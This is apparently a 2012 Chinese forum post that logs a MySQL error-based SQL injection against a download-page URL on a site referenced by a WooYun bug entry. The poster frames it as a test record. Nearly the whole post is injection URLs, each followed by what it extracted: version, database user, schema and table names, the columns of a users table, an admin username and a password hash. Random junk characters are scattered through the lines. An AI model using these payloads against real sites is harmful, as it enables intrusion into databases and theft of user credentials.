http://www.wooyun.org/bugs/wooyun-2010-01666$ e9 N8 ^# F) Q; P
: e* l3 E; u- a5 A8 c2 |) H! S之前想找个测试 没想到这有 可以测试下做个记录而已
3 l1 k) G/ U" N5 \4 m
# h& V3 O+ b$ l! m6 Y, a& ]http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003+ i2 t: t9 r. g
( _3 r9 u! F) C( `4 ]* b, E/data0/htdocs/leqi_new/app/myapp.php
: {7 ], g, z: n4 N i+ i
) M4 K$ j; j) f 或者
& G) ]& A" o) |) [; I
' U: Q: D3 V! y; q% g. [. c/**********version()**********/ 5.1.49-log3 z# j8 P# J& p5 P @7 Z
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
- m% N9 `" x% c/ q- t) z& ?
- Y" t$ z4 m4 L8 a m/**********user()**********/
4 R# M. P3 O s' f4 ~2 n, Xhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
' K! D G0 }9 C$ A9 N% A* B2 m6 ~5 [
/**********database()**********/ leqi. H9 i% b0 R1 [( E* n2 \# O
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003. V# y, Q @. b* v
2 d0 C; [7 [5 R9 e! v/ q
/**********limit依次递归爆库**********/
}. s% g6 ^! T3 |! D5 L- K7 W. Ehttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
( d$ ?+ n5 c( ]2 K5 binformation_schema9 y. t% W8 C: e6 i
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
( U. A1 }" C3 h+ C/ Wleqi
" L; C& J/ }7 ehttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
; Z& [0 x M s7 _test1 Z. p' d% |8 ]2 ?
2 J) Y$ Y2 @; X/**********limit依次递归爆表名**********/
- y& i8 E- x& fhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0037 Z: @; @" m. x7 u- X: G5 D7 Q/ V
users/ b7 B4 n( v2 @/ T. t2 \3 d
$ q. U1 E$ a# ~8 |/**********limit依次递归爆字段名**********/9 M- x0 J4 b, ~( O |5 c! X
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0038 w. D9 z# y6 W! F. Z
user_id,username,nickname,passwd,group_id$ ^* r N* N% I
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
+ Q0 S9 e: f- E! e6 S/wapc/5000_0005_003
# L# V9 {: o4 e* n& @7 C0 Q11 21& y6 X }! V! S; v
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
2 U5 p- v% T% q, M% r( _ ~: ]/wapc/5000_0005_003( n' a1 h* v! w
11 341 351 361
5 h& t3 G8 n; G e* y. e R$ i/**********爆数据**********/+ b7 A. g- N# @, y" r
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
% s. g, _1 A Q7 qadmin
( _7 J9 B& Y8 n2 d/ @* R: ?http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23( L" C6 n7 i- K1 C
6a8b4574ca231eb8bd52764d4978ffcd: j- y- f/ j* r7 ^: m; {2 [/ K
: j* G$ y0 s3 s6 j6 @( j
: O% v: u1 b5 U5 e$ J& H |
发表于 2012-9-13 17:52:09
收藏
支持
反对